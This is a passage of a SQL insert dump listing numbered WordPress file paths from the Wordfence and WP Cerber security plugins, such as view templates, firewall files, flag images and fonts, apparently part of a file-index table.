lugins/wordfence/views/dashboard/options-group-view-customization.php'),(1425,'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),(1426,'wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),(1427,'wp-content/plugins/wordfence/views/diagnostics/text.php'),(1428,'wp-content/plugins/wordfence/views/gdpr/banner.php'),(1429,'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),(1430,'wp-content/plugins/wordfence/views/onboarding/banner.php'),(1431,'wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),(1432,'wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),(1433,'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),(1434,'wp-content/plugins/wordfence/views/onboarding/overlay.php'),(1435,'wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),(1436,'wp-content/plugins/wordfence/views/onboarding/tour-overlay.php'),(1437,'wp-content/plugins/wordfence/views/options/block-all-options-controls.php'),(1438,'wp-content/plugins/wordfence/views/options/block-controls.php'),(1439,'wp-content/plugins/wordfence/views/options/option-label.php'),(1440,'wp-content/plugins/wordfence/views/options/option-select.php'),(1441,'wp-content/plugins/wordfence/views/options/option-switch.php'),(1442,'wp-content/plugins/wordfence/views/options/option-text.php'),(1443,'wp-content/plugins/wordfence/views/options/option-textarea.php'),(1444,'wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php'),(1445,'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php'),(1446,'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php'),(1447,'wp-content/plugins/wordfence/views/options/option-toggled-select.php'),(1448,'wp-content/plugins/wordfence/views/options/option-toggled-sub.php'),(1449,'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php'),(1450,'wp-content/plugins/wordfence/views/options/option-toggled.php'),(1451,'wp-content/plugins/wordfence/views/options/option-token.php'),(1452,'wp-content/plugins/wordfence/views/options/options-title.php'),(1453,'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php'),(1454,'wp-content/plugins/wordfence/views/reports/activity-report.php'),(1455,'wp-content/plugins/wordfence/views/scanner/issue-base.php'),(1456,'wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php'),(1457,'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php'),(1458,'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php'),(1459,'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php'),(1460,'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php'),(1461,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php'),(1462,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php'),(1463,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php'),(1464,'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php'),(1465,'wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php'),(1466,'wp-content/plugins/wordfence/views/scanner/issue-control-repair.php'),(1467,'wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php'),(1468,'wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php'),(1469,'wp-content/plugins/wordfence/views/scanner/issue-database.php'),(1470,'wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php'),(1471,'wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php'),(1472,'wp-content/plugins/wordfence/views/scanner/issue-file.php'),(1473,'wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php'),(1474,'wp-content/plugins/wordfence/views/scanner/issue-knownfile.php'),(1475,'wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php'),(1476,'wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php'),(1477,'wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php'),(1478,'wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php'),(1479,'wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php'),(1480,'wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php'),(1481,'wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php'),(1482,'wp-content/plugins/wordfence/views/scanner/issue-timelimit.php'),(1483,'wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php'),(1484,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php'),(1485,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php'),(1486,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php'),(1487,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php'),(1488,'wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php'),(1489,'wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php'),(1490,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php'),(1491,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php'),(1492,'wp-content/plugins/wordfence/views/scanner/no-issues.php'),(1493,'wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php'),(1494,'wp-content/plugins/wordfence/views/scanner/options-group-advanced.php'),(1495,'wp-content/plugins/wordfence/views/scanner/options-group-basic.php'),(1496,'wp-content/plugins/wordfence/views/scanner/options-group-general.php'),(1497,'wp-content/plugins/wordfence/views/scanner/options-group-performance.php'),(1498,'wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php'),(1499,'wp-content/plugins/wordfence/views/scanner/scan-failed.php'),(1500,'wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php'),(1501,'wp-content/plugins/wordfence/views/scanner/scan-progress-element.php'),(1502,'wp-content/plugins/wordfence/views/scanner/scan-progress.php'),(1503,'wp-content/plugins/wordfence/views/scanner/scan-results.php'),(1504,'wp-content/plugins/wordfence/views/scanner/scan-scheduling.php'),(1505,'wp-content/plugins/wordfence/views/scanner/scan-starter.php'),(1506,'wp-content/plugins/wordfence/views/scanner/scan-type.php'),(1507,'wp-content/plugins/wordfence/views/scanner/scanner-status.php'),(1508,'wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php'),(1509,'wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php'),(1510,'wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php'),(1511,'wp-content/plugins/wordfence/views/scanner/site-cleaning.php'),(1512,'wp-content/plugins/wordfence/views/tools/options-group-2fa.php'),(1513,'wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php'),(1514,'wp-content/plugins/wordfence/views/tours/login-security.php'),(1515,'wp-content/plugins/wordfence/views/unsupported-php/admin-message.php'),(1516,'wp-content/plugins/wordfence/views/waf/debug.php'),(1517,'wp-content/plugins/wordfence/views/waf/firewall-status.php'),(1518,'wp-content/plugins/wordfence/views/waf/option-rate-limit.php'),(1519,'wp-content/plugins/wordfence/views/waf/option-rules.php'),(1520,'wp-content/plugins/wordfence/views/waf/option-whitelist.php'),(1521,'wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php'),(1522,'wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php'),(1523,'wp-content/plugins/wordfence/views/waf/options-group-brute-force.php'),(1524,'wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php'),(1525,'wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php'),(1526,'wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php'),(1527,'wp-content/plugins/wordfence/views/waf/waf-install-manual.php'),(1528,'wp-content/plugins/wordfence/views/waf/waf-install-success.php'),(1529,'wp-content/plugins/wordfence/views/waf/waf-install.php'),(1530,'wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php'),(1531,'wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php'),(1532,'wp-content/plugins/wordfence/views/waf/waf-uninstall.php'),(1533,'wp-content/plugins/wordfence/waf/.htaccess'),(1534,'wp-content/plugins/wordfence/waf/bootstrap.php'),(1535,'wp-content/plugins/wordfence/waf/pomo/entry.php'),(1536,'wp-content/plugins/wordfence/waf/pomo/mo.php'),(1537,'wp-content/plugins/wordfence/waf/pomo/plural-forms.php'),(1538,'wp-content/plugins/wordfence/waf/pomo/po.php'),(1539,'wp-content/plugins/wordfence/waf/pomo/streams.php'),(1540,'wp-content/plugins/wordfence/waf/pomo/translations.php'),(1541,'wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php'),(1542,'wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php'),(1543,'wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php'),(1544,'wp-content/plugins/wordfence/wordfence.php'),(1545,'wp-content/plugins/wp-cerber/admin/cerber-admin-settings.php'),(1546,'wp-content/plugins/wp-cerber/admin/cerber-admin.php'),(1547,'wp-content/plugins/wp-cerber/admin/cerber-dashboard.php'),(1548,'wp-content/plugins/wp-cerber/admin/cerber-tools.php'),(1549,'wp-content/plugins/wp-cerber/admin/cerber-users.php'),(1550,'wp-content/plugins/wp-cerber/assets/admin.css'),(1551,'wp-content/plugins/wp-cerber/assets/admin.js'),(1552,'wp-content/plugins/wp-cerber/assets/ajax-loader.gif'),(1553,'wp-content/plugins/wp-cerber/assets/bgwidget.png'),(1554,'wp-content/plugins/wp-cerber/assets/bn2ra.png'),(1555,'wp-content/plugins/wp-cerber/assets/bn3ra.png'),(1556,'wp-content/plugins/wp-cerber/assets/bn4ra.png'),(1557,'wp-content/plugins/wp-cerber/assets/bn5ra.png'),(1558,'wp-content/plugins/wp-cerber/assets/crb-logo-vn.png'),(1559,'wp-content/plugins/wp-cerber/assets/fb2b.png'),(1560,'wp-content/plugins/wp-cerber/assets/flags/ad.gif'),(1561,'wp-content/plugins/wp-cerber/assets/flags/ae.gif'),(1562,'wp-content/plugins/wp-cerber/assets/flags/af.gif'),(1563,'wp-content/plugins/wp-cerber/assets/flags/ag.gif'),(1564,'wp-content/plugins/wp-cerber/assets/flags/ai.gif'),(1565,'wp-content/plugins/wp-cerber/assets/flags/al.gif'),(1566,'wp-content/plugins/wp-cerber/assets/flags/am.gif'),(1567,'wp-content/plugins/wp-cerber/assets/flags/an.gif'),(1568,'wp-content/plugins/wp-cerber/assets/flags/ao.gif'),(1569,'wp-content/plugins/wp-cerber/assets/flags/aq.gif'),(1570,'wp-content/plugins/wp-cerber/assets/flags/ar.gif'),(1571,'wp-content/plugins/wp-cerber/assets/flags/as.gif'),(1572,'wp-content/plugins/wp-cerber/assets/flags/at.gif'),(1573,'wp-content/plugins/wp-cerber/assets/flags/au.gif'),(1574,'wp-content/plugins/wp-cerber/assets/flags/aw.gif'),(1575,'wp-content/plugins/wp-cerber/assets/flags/ax.gif'),(1576,'wp-content/plugins/wp-cerber/assets/flags/az.gif'),(1577,'wp-content/plugins/wp-cerber/assets/flags/ba.gif'),(1578,'wp-content/plugins/wp-cerber/assets/flags/bb.gif'),(1579,'wp-content/plugins/wp-cerber/assets/flags/bd.gif'),(1580,'wp-content/plugins/wp-cerber/assets/flags/be.gif'),(1581,'wp-content/plugins/wp-cerber/assets/flags/bf.gif'),(1582,'wp-content/plugins/wp-cerber/assets/flags/bg.gif'),(1583,'wp-content/plugins/wp-cerber/assets/flags/bh.gif'),(1584,'wp-content/plugins/wp-cerber/assets/flags/bi.gif'),(1585,'wp-content/plugins/wp-cerber/assets/flags/bj.gif'),(1586,'wp-content/plugins/wp-cerber/assets/flags/bl.gif'),(1587,'wp-content/plugins/wp-cerber/assets/flags/bm.gif'),(1588,'wp-content/plugins/wp-cerber/assets/flags/bn.gif'),(1589,'wp-content/plugins/wp-cerber/assets/flags/bo.gif'),(1590,'wp-content/plugins/wp-cerber/assets/flags/bq.gif'),(1591,'wp-content/plugins/wp-cerber/assets/flags/br.gif'),(1592,'wp-content/plugins/wp-cerber/assets/flags/bs.gif'),(1593,'wp-content/plugins/wp-cerber/assets/flags/bt.gif'),(1594,'wp-content/plugins/wp-cerber/assets/flags/bv.gif'),(1595,'wp-content/plugins/wp-cerber/assets/flags/bw.gif'),(1596,'wp-content/plugins/wp-cerber/assets/flags/by.gif'),(1597,'wp-content/plugins/wp-cerber/assets/flags/bz.gif'),(1598,'wp-content/plugins/wp-cerber/assets/flags/ca.gif'),(1599,'wp-content/plugins/wp-cerber/assets/flags/cc.gif'),(1600,'wp-content/plugins/wp-cerber/assets/flags/cd.gif'),(1601,'wp-content/plugins/wp-cerber/assets/flags/cf.gif'),(1602,'wp-content/plugins/wp-cerber/assets/flags/cg.gif'),(1603,'wp-content/plugins/wp-cerber/assets/flags/ch.gif'),(1604,'wp-content/plugins/wp-cerber/assets/flags/ci.gif'),(1605,'wp-content/plugins/wp-cerber/assets/flags/ck.gif'),(1606,'wp-content/plugins/wp-cerber/assets/flags/cl.gif'),(1607,'wp-content/plugins/wp-cerber/assets/flags/cm.gif'),(1608,'wp-content/plugins/wp-cerber/assets/flags/cn.gif'),(1609,'wp-content/plugins/wp-cerber/assets/flags/co.gif'),(1610,'wp-content/plugins/wp-cerber/assets/flags/cr.gif'),(1611,'wp-content/plugins/wp-cerber/assets/flags/cs.gif'),(1612,'wp-content/plugins/wp-cerber/assets/flags/cu.gif'),(1613,'wp-content/plugins/wp-cerber/assets/flags/cv.gif'),(1614,'wp-content/plugins/wp-cerber/assets/flags/cw.gif'),(1615,'wp-content/plugins/wp-cerber/assets/flags/cx.gif'),(1616,'wp-content/plugins/wp-cerber/assets/flags/cy.gif'),(1617,'wp-content/plugins/wp-cerber/assets/flags/cz.gif'),(1618,'wp-content/plugins/wp-cerber/assets/flags/de.gif'),(1619,'wp-content/plugins/wp-cerber/assets/flags/dj.gif'),(1620,'wp-content/plugins/wp-cerber/assets/flags/dk.gif'),(1621,'wp-content/plugins/wp-cerber/assets/flags/dm.gif'),(1622,'wp-content/plugins/wp-cerber/assets/flags/do.gif'),(1623,'wp-content/plugins/wp-cerber/assets/flags/dz.gif'),(1624,'wp-content/plugins/wp-cerber/assets/flags/ec.gif'),(1625,'wp-content/plugins/wp-cerber/assets/flags/ee.gif'),(1626,'wp-content/plugins/wp-cerber/assets/flags/eg.gif'),(1627,'wp-content/plugins/wp-cerber/assets/flags/eh.gif'),(1628,'wp-content/plugins/wp-cerber/assets/flags/er.gif'),(1629,'wp-content/plugins/wp-cerber/assets/flags/es.gif'),(1630,'wp-content/plugins/wp-cerber/assets/flags/et.gif'),(1631,'wp-content/plugins/wp-cerber/assets/flags/eu.gif'),(1632,'wp-content/plugins/wp-cerber/assets/flags/ez.gif'),(1633,'wp-content/plugins/wp-cerber/assets/flags/fi.gif'),(1634,'wp-content/plugins/wp-cerber/assets/flags/fj.gif'),(1635,'wp-content/plugins/wp-cerber/assets/flags/fk.gif'),(1636,'wp-content/plugins/wp-cerber/assets/flags/fm.gif'),(1637,'wp-content/plugins/wp-cerber/assets/flags/fo.gif'),(1638,'wp-content/plugins/wp-cerber/assets/flags/fr.gif'),(1639,'wp-content/plugins/wp-cerber/assets/flags/ga.gif'),(1640,'wp-content/plugins/wp-cerber/assets/flags/gb.gif'),(1641,'wp-content/plugins/wp-cerber/assets/flags/gd.gif'),(1642,'wp-content/plugins/wp-cerber/assets/flags/ge.gif'),(1643,'wp-content/plugins/wp-cerber/assets/flags/gf.gif'),(1644,'wp-content/plugins/wp-cerber/assets/flags/gg.gif'),(1645,'wp-content/plugins/wp-cerber/assets/flags/gh.gif'),(1646,'wp-content/plugins/wp-cerber/assets/flags/gi.gif'),(1647,'wp-content/plugins/wp-cerber/assets/flags/gl.gif'),(1648,'wp-content/plugins/wp-cerber/assets/flags/gm.gif'),(1649,'wp-content/plugins/wp-cerber/assets/flags/gn.gif'),(1650,'wp-content/plugins/wp-cerber/assets/flags/gp.gif'),(1651,'wp-content/plugins/wp-cerber/assets/flags/gq.gif'),(1652,'wp-content/plugins/wp-cerber/assets/flags/gr.gif'),(1653,'wp-content/plugins/wp-cerber/assets/flags/gs.gif'),(1654,'wp-content/plugins/wp-cerber/assets/flags/gt.gif'),(1655,'wp-content/plugins/wp-cerber/assets/flags/gu.gif'),(1656,'wp-content/plugins/wp-cerber/assets/flags/gw.gif'),(1657,'wp-content/plugins/wp-cerber/assets/flags/gy.gif'),(1658,'wp-content/plugins/wp-cerber/assets/flags/hk.gif'),(1659,'wp-content/plugins/wp-cerber/assets/flags/hm.gif'),(1660,'wp-content/plugins/wp-cerber/assets/flags/hn.gif'),(1661,'wp-content/plugins/wp-cerber/assets/flags/hr.gif'),(1662,'wp-content/plugins/wp-cerber/assets/flags/ht.gif'),(1663,'wp-content/plugins/wp-cerber/assets/flags/hu.gif'),(1664,'wp-content/plugins/wp-cerber/assets/flags/id.gif'),(1665,'wp-content/plugins/wp-cerber/assets/flags/ie.gif'),(1666,'wp-content/plugins/wp-cerber/assets/flags/il.gif'),(1667,'wp-content/plugins/wp-cerber/assets/flags/im.gif'),(1668,'wp-content/plugins/wp-cerber/assets/flags/in.gif'),(1669,'wp-content/plugins/wp-cerber/assets/flags/io.gif'),(1670,'wp-content/plugins/wp-cerber/assets/flags/iq.gif'),(1671,'wp-content/plugins/wp-cerber/assets/flags/ir.gif'),(1672,'wp-content/plugins/wp-cerber/assets/flags/is.gif'),(1673,'wp-content/plugins/wp-cerber/assets/flags/it.gif'),(1674,'wp-content/plugins/wp-cerber/assets/flags/je.gif'),(1675,'wp-content/plugins/wp-cerber/assets/flags/jm.gif'),(1676,'wp-content/plugins/wp-cerber/assets/flags/jo.gif'),(1677,'wp-content/plugins/wp-cerber/assets/flags/jp.gif'),(1678,'wp-content/plugins/wp-cerber/assets/flags/ke.gif'),(1679,'wp-content/plugins/wp-cerber/assets/flags/kg.gif'),(1680,'wp-content/plugins/wp-cerber/assets/flags/kh.gif'),(1681,'wp-content/plugins/wp-cerber/assets/flags/ki.gif'),(1682,'wp-content/plugins/wp-cerber/assets/flags/km.gif'),(1683,'wp-content/plugins/wp-cerber/assets/flags/kn.gif'),(1684,'wp-content/plugins/wp-cerber/assets/flags/kp.gif'),(1685,'wp-content/plugins/wp-cerber/assets/flags/kr.gif'),(1686,'wp-content/plugins/wp-cerber/assets/flags/kw.gif'),(1687,'wp-content/plugins/wp-cerber/assets/flags/ky.gif'),(1688,'wp-content/plugins/wp-cerber/assets/flags/kz.gif'),(1689,'wp-content/plugins/wp-cerber/assets/flags/la.gif'),(1690,'wp-content/plugins/wp-cerber/assets/flags/lb.gif'),(1691,'wp-content/plugins/wp-cerber/assets/flags/lc.gif'),(1692,'wp-content/plugins/wp-cerber/assets/flags/li.gif'),(1693,'wp-content/plugins/wp-cerber/assets/flags/lk.gif'),(1694,'wp-content/plugins/wp-cerber/assets/flags/lr.gif'),(1695,'wp-content/plugins/wp-cerber/assets/flags/ls.gif'),(1696,'wp-content/plugins/wp-cerber/assets/flags/lt.gif'),(1697,'wp-content/plugins/wp-cerber/assets/flags/lu.gif'),(1698,'wp-content/plugins/wp-cerber/assets/flags/lv.gif'),(1699,'wp-content/plugins/wp-cerber/assets/flags/ly.gif'),(1700,'wp-content/plugins/wp-cerber/assets/flags/ma.gif'),(1701,'wp-content/plugins/wp-cerber/assets/flags/mc.gif'),(1702,'wp-content/plugins/wp-cerber/assets/flags/md.gif'),(1703,'wp-content/plugins/wp-cerber/assets/flags/me.gif'),(1704,'wp-content/plugins/wp-cerber/assets/flags/mf.gif'),(1705,'wp-content/plugins/wp-cerber/assets/flags/mg.gif'),(1706,'wp-content/plugins/wp-cerber/assets/flags/mh.gif'),(1707,'wp-content/plugins/wp-cerber/assets/flags/mk.gif'),(1708,'wp-content/plugins/wp-cerber/assets/flags/ml.gif'),(1709,'wp-content/plugins/wp-cerber/assets/flags/mm.gif'),(1710,'wp-content/plugins/wp-cerber/assets/flags/mn.gif'),(1711,'wp-content/plugins/wp-cerber/assets/flags/mo.gif'),(1712,'wp-content/plugins/wp-cerber/assets/flags/mp.gif'),(1713,'wp-content/plugins/wp-cerber/assets/flags/mq.gif'),(1714,'wp-content/plugins/wp-cerber/assets/flags/mr.gif'),(1715,'wp-content/plugins/wp-cerber/assets/flags/ms.gif'),(1716,'wp-content/plugins/wp-cerber/assets/flags/mt.gif'),(1717,'wp-content/plugins/wp-cerber/assets/flags/mu.gif'),(1718,'wp-content/plugins/wp-cerber/assets/flags/mv.gif'),(1719,'wp-content/plugins/wp-cerber/assets/flags/mw.gif'),(1720,'wp-content/plugins/wp-cerber/assets/flags/mx.gif'),(1721,'wp-content/plugins/wp-cerber/assets/flags/my.gif'),(1722,'wp-content/plugins/wp-cerber/assets/flags/mz.gif'),(1723,'wp-content/plugins/wp-cerber/assets/flags/na.gif'),(1724,'wp-content/plugins/wp-cerber/assets/flags/nc.gif'),(1725,'wp-content/plugins/wp-cerber/assets/flags/ne.gif'),(1726,'wp-content/plugins/wp-cerber/assets/flags/nf.gif'),(1727,'wp-content/plugins/wp-cerber/assets/flags/ng.gif'),(1728,'wp-content/plugins/wp-cerber/assets/flags/ni.gif'),(1729,'wp-content/plugins/wp-cerber/assets/flags/nl.gif'),(1730,'wp-content/plugins/wp-cerber/assets/flags/no.gif'),(1731,'wp-content/plugins/wp-cerber/assets/flags/np.gif'),(1732,'wp-content/plugins/wp-cerber/assets/flags/nr.gif'),(1733,'wp-content/plugins/wp-cerber/assets/flags/nu.gif'),(1734,'wp-content/plugins/wp-cerber/assets/flags/nz.gif'),(1735,'wp-content/plugins/wp-cerber/assets/flags/om.gif'),(1736,'wp-content/plugins/wp-cerber/assets/flags/pa.gif'),(1737,'wp-content/plugins/wp-cerber/assets/flags/pe.gif'),(1738,'wp-content/plugins/wp-cerber/assets/flags/pf.gif'),(1739,'wp-content/plugins/wp-cerber/assets/flags/pg.gif'),(1740,'wp-content/plugins/wp-cerber/assets/flags/ph.gif'),(1741,'wp-content/plugins/wp-cerber/assets/flags/pk.gif'),(1742,'wp-content/plugins/wp-cerber/assets/flags/pl.gif'),(1743,'wp-content/plugins/wp-cerber/assets/flags/pm.gif'),(1744,'wp-content/plugins/wp-cerber/assets/flags/pn.gif'),(1745,'wp-content/plugins/wp-cerber/assets/flags/pr.gif'),(1746,'wp-content/plugins/wp-cerber/assets/flags/ps.gif'),(1747,'wp-content/plugins/wp-cerber/assets/flags/pt.gif'),(1748,'wp-content/plugins/wp-cerber/assets/flags/pw.gif'),(1749,'wp-content/plugins/wp-cerber/assets/flags/py.gif'),(1750,'wp-content/plugins/wp-cerber/assets/flags/qa.gif'),(1751,'wp-content/plugins/wp-cerber/assets/flags/re.gif'),(1752,'wp-content/plugins/wp-cerber/assets/flags/ro.gif'),(1753,'wp-content/plugins/wp-cerber/assets/flags/rs.gif'),(1754,'wp-content/plugins/wp-cerber/assets/flags/ru.gif'),(1755,'wp-content/plugins/wp-cerber/assets/flags/rw.gif'),(1756,'wp-content/plugins/wp-cerber/assets/flags/sa.gif'),(1757,'wp-content/plugins/wp-cerber/assets/flags/sb.gif'),(1758,'wp-content/plugins/wp-cerber/assets/flags/sc.gif'),(1759,'wp-content/plugins/wp-cerber/assets/flags/sd.gif'),(1760,'wp-content/plugins/wp-cerber/assets/flags/se.gif'),(1761,'wp-content/plugins/wp-cerber/assets/flags/sg.gif'),(1762,'wp-content/plugins/wp-cerber/assets/flags/sh.gif'),(1763,'wp-content/plugins/wp-cerber/assets/flags/si.gif'),(1764,'wp-content/plugins/wp-cerber/assets/flags/sj.gif'),(1765,'wp-content/plugins/wp-cerber/assets/flags/sk.gif'),(1766,'wp-content/plugins/wp-cerber/assets/flags/sl.gif'),(1767,'wp-content/plugins/wp-cerber/assets/flags/sm.gif'),(1768,'wp-content/plugins/wp-cerber/assets/flags/sn.gif'),(1769,'wp-content/plugins/wp-cerber/assets/flags/so.gif'),(1770,'wp-content/plugins/wp-cerber/assets/flags/sr.gif'),(1771,'wp-content/plugins/wp-cerber/assets/flags/ss.gif'),(1772,'wp-content/plugins/wp-cerber/assets/flags/st.gif'),(1773,'wp-content/plugins/wp-cerber/assets/flags/sv.gif'),(1774,'wp-content/plugins/wp-cerber/assets/flags/sx.gif'),(1775,'wp-content/plugins/wp-cerber/assets/flags/sy.gif'),(1776,'wp-content/plugins/wp-cerber/assets/flags/sz.gif'),(1777,'wp-content/plugins/wp-cerber/assets/flags/tc.gif'),(1778,'wp-content/plugins/wp-cerber/assets/flags/td.gif'),(1779,'wp-content/plugins/wp-cerber/assets/flags/tf.gif'),(1780,'wp-content/plugins/wp-cerber/assets/flags/tg.gif'),(1781,'wp-content/plugins/wp-cerber/assets/flags/th.gif'),(1782,'wp-content/plugins/wp-cerber/assets/flags/tj.gif'),(1783,'wp-content/plugins/wp-cerber/assets/flags/tk.gif'),(1784,'wp-content/plugins/wp-cerber/assets/flags/tl.gif'),(1785,'wp-content/plugins/wp-cerber/assets/flags/tm.gif'),(1786,'wp-content/plugins/wp-cerber/assets/flags/tn.gif'),(1787,'wp-content/plugins/wp-cerber/assets/flags/to.gif'),(1788,'wp-content/plugins/wp-cerber/assets/flags/tr.gif'),(1789,'wp-content/plugins/wp-cerber/assets/flags/tt.gif'),(1790,'wp-content/plugins/wp-cerber/assets/flags/tv.gif'),(1791,'wp-content/plugins/wp-cerber/assets/flags/tw.gif'),(1792,'wp-content/plugins/wp-cerber/assets/flags/tz.gif'),(1793,'wp-content/plugins/wp-cerber/assets/flags/ua.gif'),(1794,'wp-content/plugins/wp-cerber/assets/flags/ug.gif'),(1795,'wp-content/plugins/wp-cerber/assets/flags/um.gif'),(1796,'wp-content/plugins/wp-cerber/assets/flags/us.gif'),(1797,'wp-content/plugins/wp-cerber/assets/flags/uy.gif'),(1798,'wp-content/plugins/wp-cerber/assets/flags/uz.gif'),(1799,'wp-content/plugins/wp-cerber/assets/flags/va.gif'),(1800,'wp-content/plugins/wp-cerber/assets/flags/vc.gif'),(1801,'wp-content/plugins/wp-cerber/assets/flags/ve.gif'),(1802,'wp-content/plugins/wp-cerber/assets/flags/vg.gif'),(1803,'wp-content/plugins/wp-cerber/assets/flags/vi.gif'),(1804,'wp-content/plugins/wp-cerber/assets/flags/vn.gif'),(1805,'wp-content/plugins/wp-cerber/assets/flags/vu.gif'),(1806,'wp-content/plugins/wp-cerber/assets/flags/wf.gif'),(1807,'wp-content/plugins/wp-cerber/assets/flags/ws.gif'),(1808,'wp-content/plugins/wp-cerber/assets/flags/ye.gif'),(1809,'wp-content/plugins/wp-cerber/assets/flags/yt.gif'),(1810,'wp-content/plugins/wp-cerber/assets/flags/za.gif'),(1811,'wp-content/plugins/wp-cerber/assets/flags/zm.gif'),(1812,'wp-content/plugins/wp-cerber/assets/flags/zw.gif'),(1813,'wp-content/plugins/wp-cerber/assets/fonts/cerber.eot'),(1814,'wp-content/plugins/wp-cerber/assets/fonts/cerber.ttf'),(1815,'wp-content/plugins/wp-cerber/assets/fonts/cerber.woff'),(1816,'wp-content/plugins/wp-cerber/assets/fonts/roboto/LICENSE.txt'),(1817,'wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Bold.woff'),(1818,'wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Light.woff'),(1819,'wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Medium.woff'),(1820,'wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Mono_400.woff2'),(1821,'wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Mono_500.woff2'),(1822,'wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Regular.woff'),(1823,'wp-content/plugins/wp-cerber/assets/goo-translate.png'),(1824,'wp-content/plugins/wp-cerber/assets/icons/fonts/crb.svg'),(1825,'wp-content/plugins/wp-cerber/assets/icons/fonts/crb.ttf'),(1826,'wp-content/plugins/wp-cerber/assets/icons/fonts/crb.woff'),(1827,'wp-content/plugins/wp-cerber/assets/icons/style.css'),(1828,'wp-content/plugins/wp-cerber/assets/inspector.png'),(1829,'wp-content/plugins/wp-cerber/assets/magnific/LICENSE'),(1830,'wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js'),(1831,'wp-content/plugins/wp-cerber/assets/magnific/magnific-popup.css'),(1832,'wp-content/plugins/wp-cerber/assets/multi/license.txt'),(1833,'wp-content/plugins/wp-cerber/assets/multi/multi.css'),(1834,'wp-content/plugins/wp-cerber/assets/multi/multi.js'),(1835,'wp-content/plugins/wp-cerber/assets/multi/multi.min.js'),(1836,'wp-content/plugins/wp-cerber/assets/nexus.css'),(1837,'wp-content/plugins/wp-cerber/assets/rateit.png'),(1838,'wp-content/plugins/wp-cerber/assets/rateit2.png'),(1839,'wp-content/plugins/wp-cerber/assets/scanner.js'),(1840,'wp-content/plugins/wp-cerber/assets/select2/LICENSE.md'),(1841,'wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css'),(1842,'wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js'),(1843,'wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js'),(1844,'wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js'),(1845,'wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css'),(1846,'wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css'),(1847,'wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css'),(1848,'wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js'),(1849,'wp-content/plugins/wp-cerber/assets/ui-stack.css'),(1850,'wp-content/plugins/wp-cerber/assets/ui-stack.js'),(1851,'wp-content/plugins/wp-cerber/assets/wp-admin.js'),(1852,'wp-content/plugins/wp-cerber/assets/wrench.png'),(1853,'wp-content/plugins/wp-cerber/cerber-2fa.php'),(1854,'wp-content/plugins/wp-cerber/cerber-addons.php'),(1855,'wp-content/plugins/wp-cerber/cerber-common.php'),(1856,'wp-content/plugins/wp-cerber/cerber-ds.php'),